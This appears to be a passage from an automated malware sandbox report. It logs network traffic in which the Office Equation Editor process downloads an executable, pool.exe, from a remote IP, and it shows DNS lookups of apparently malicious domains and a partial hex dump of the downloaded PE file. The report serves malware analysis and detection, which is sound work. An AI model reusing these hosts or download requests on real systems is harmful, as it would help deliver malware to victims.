                                                                                                                                                  Jul 22, 2021 17:15:03.150876045 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.150896072 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.150913000 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.150943995 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.150959969 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.150974989 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.151098967 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.151123047 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.151127100 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.151132107 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.151134968 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.151137114 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.151139975 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.151141882 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.151144028 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.151146889 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.151149035 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.151150942 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.193397045 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193439007 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193464041 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193486929 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193510056 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193532944 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193556070 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193578959 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193602085 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193627119 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193650961 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193665028 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.193674088 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193696022 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193718910 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193739891 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193763018 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193772078 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.193784952 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193810940 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193834066 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193856001 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193871021 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.193877935 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.193877935 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193902016 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193913937 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.193922997 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193945885 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193953991 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.193968058 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193991899 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.193994999 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194001913 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194015980 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194036961 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194037914 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194046021 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194061041 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194072008 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194082975 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194096088 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194104910 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194112062 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194127083 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194139957 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194149971 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194149971 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194175005 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194183111 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194199085 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194211006 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194221973 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194222927 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194245100 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194259882 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194267988 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194278955 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194291115 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194295883 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194313049 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194329977 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194334984 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194344997 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194360971 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194365978 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194397926 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194420099 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194420099 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194447041 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194467068 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194485903 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194490910 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194499969 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194511890 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194525003 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194535971 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194536924 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194559097 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194576025 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194581985 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194603920 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194626093 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194624901 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194652081 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194663048 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194669962 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194675922 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194699049 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194721937 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194725037 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194744110 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194745064 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194755077 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194767952 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194778919 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194789886 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194792986 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194813013 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194839001 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194860935 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194863081 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194885015 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194906950 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194928885 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194936991 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194952011 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194952965 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194974899 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.194991112 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.194997072 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195024014 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195041895 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195046902 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195056915 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195065975 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195080042 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195091963 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195101976 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195123911 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195137024 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195162058 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195224047 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195246935 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195260048 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195270061 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195276976 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195287943 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195302010 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195323944 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195324898 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195348978 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195348978 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195363998 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195394993 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195497990 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195519924 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195542097 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195558071 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195563078 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195565939 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195578098 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195591927 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195607901 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195615053 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195635080 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195636034 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195642948 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195658922 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195667982 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195682049 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195696115 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195698977 CEST80491653.121.113.175192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:15:03.195743084 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.195755959 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.201230049 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.202836037 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:15:03.884951115 CEST4916580192.168.2.223.121.113.175
                                                                                                                                                  Jul 22, 2021 17:16:38.317858934 CEST4916680192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:16:38.442656040 CEST8049166199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:38.442775965 CEST4916680192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:16:38.442984104 CEST4916680192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:16:38.567553043 CEST8049166199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:38.568079948 CEST8049166199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:38.568145990 CEST8049166199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:38.568177938 CEST8049166199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:38.568193913 CEST8049166199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:38.568216085 CEST8049166199.59.242.153192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:38.568347931 CEST4916680192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:16:38.568492889 CEST4916680192.168.2.22199.59.242.153
                                                                                                                                                  Jul 22, 2021 17:16:43.640398979 CEST4916780192.168.2.22151.101.0.119
                                                                                                                                                  Jul 22, 2021 17:16:43.685012102 CEST8049167151.101.0.119192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:43.686702967 CEST4916780192.168.2.22151.101.0.119
                                                                                                                                                  Jul 22, 2021 17:16:43.686728001 CEST4916780192.168.2.22151.101.0.119
                                                                                                                                                  Jul 22, 2021 17:16:43.733503103 CEST8049167151.101.0.119192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:43.832999945 CEST8049167151.101.0.119192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:43.833024025 CEST8049167151.101.0.119192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:43.833038092 CEST8049167151.101.0.119192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:43.833173037 CEST4916780192.168.2.22151.101.0.119
                                                                                                                                                  Jul 22, 2021 17:16:43.833276033 CEST4916780192.168.2.22151.101.0.119

                                                                                                                                                  UDP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Jul 22, 2021 17:16:37.906949043 CEST5219753192.168.2.228.8.8.8
                                                                                                                                                  Jul 22, 2021 17:16:38.297278881 CEST53521978.8.8.8192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:43.574949026 CEST5309953192.168.2.228.8.8.8
                                                                                                                                                  Jul 22, 2021 17:16:43.638854027 CEST53530998.8.8.8192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:48.827698946 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                  Jul 22, 2021 17:16:49.840526104 CEST5283853192.168.2.228.8.8.8
                                                                                                                                                  Jul 22, 2021 17:16:49.950583935 CEST53528388.8.8.8192.168.2.22
                                                                                                                                                  Jul 22, 2021 17:16:51.092057943 CEST53528388.8.8.8192.168.2.22

                                                                                                                                                  ICMP Packets

                                                                                                                                                  TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                  Jul 22, 2021 17:16:51.093327045 CEST192.168.2.228.8.8.8d041(Port unreachable)Destination Unreachable

                                                                                                                                                  DNS Queries

                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                  Jul 22, 2021 17:16:37.906949043 CEST192.168.2.228.8.8.80x2e78Standard query (0)www.pon.xyzA (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:43.574949026 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.intoxickiss.comA (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:48.827698946 CEST192.168.2.228.8.8.80x3c4eStandard query (0)www.800pls.infoA (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:49.840526104 CEST192.168.2.228.8.8.80x3c4eStandard query (0)www.800pls.infoA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Jul 22, 2021 17:16:38.297278881 CEST8.8.8.8192.168.2.220x2e78No error (0)www.pon.xyz71822.bodis.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:38.297278881 CEST8.8.8.8192.168.2.220x2e78No error (0)71822.bodis.com199.59.242.153A (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:43.638854027 CEST8.8.8.8192.168.2.220x2f03No error (0)www.intoxickiss.comintoxickiss.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:43.638854027 CEST8.8.8.8192.168.2.220x2f03No error (0)intoxickiss.com151.101.0.119A (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:43.638854027 CEST8.8.8.8192.168.2.220x2f03No error (0)intoxickiss.com151.101.64.119A (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:43.638854027 CEST8.8.8.8192.168.2.220x2f03No error (0)intoxickiss.com151.101.128.119A (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:43.638854027 CEST8.8.8.8192.168.2.220x2f03No error (0)intoxickiss.com151.101.192.119A (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:49.950583935 CEST8.8.8.8192.168.2.220x3c4eName error (3)www.800pls.infononenoneA (IP address)IN (0x0001)
                                                                                                                                                  Jul 22, 2021 17:16:51.092057943 CEST8.8.8.8192.168.2.220x3c4eName error (3)www.800pls.infononenoneA (IP address)IN (0x0001)

                                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                                  • 3.121.113.175
                                                                                                                                                  • www.pon.xyz
                                                                                                                                                  • www.intoxickiss.com

                                                                                                                                                  HTTP Packets

                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  0192.168.2.22491653.121.113.17580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Jul 22, 2021 17:15:02.789858103 CEST0OUTGET /www/pool.exe HTTP/1.1
                                                                                                                                                  Accept: */*
                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                  Host: 3.121.113.175
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Jul 22, 2021 17:15:02.833070993 CEST1INHTTP/1.1 200 OK
                                                                                                                                                  Date: Thu, 22 Jul 2021 15:14:54 GMT
                                                                                                                                                  Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7
                                                                                                                                                  Last-Modified: Thu, 22 Jul 2021 05:09:55 GMT
                                                                                                                                                  ETag: "ae200-5c7af4c3e3d9d"
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Content-Length: 713216
                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cc df f8 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 d8 0a 00 00 08 00 00 00 00 00 00 ce f6 0a 00 00 20 00 00 00 00 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c f6 0a 00 4f 00 00 00 00 00 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ec d6 0a 00 00 20 00 00 00 d8 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 00 06 00 00 00 00 0b 00 00 06 00 00 00 da 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0b 00 00 02 00 00 00 e0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 f6 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 dc e1 00 00 70 eb 00 00 03 00 00 00 01 00 00 06 4c cd 01 00 30 29 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 20 00 00 0a 28 21 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 22 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 17 28 26 00 00 0a 00 02 16 28 27 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 45 02 00 06 28 28 00 00 0a 00 2a 26 00 02 28 29 00 00 0a 00 2a ce 73 2a 00 00 0a 80 01 00 00 04 73 2b 00 00 0a 80 02 00 00 04 73 2c 00 00 0a 80 03 00 00 04 73 2d 00 00 0a 80 04 00 00 04 73 2e 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 31 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 32 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 33 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 34 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 35 00 00 0a 6f 36 00 00 0a 73 37 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00
                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`P @ @@|O H.text `.rsrc@@.reloc @BHpL0)0( (!(o"*(#($(%(&('*N(oE((*&()*s*s+s,s-s.*0~o/+*0~o0+*0~o1+*0~o2+*0~o3+*0<~(4,!rp(5o6s7~+*0~
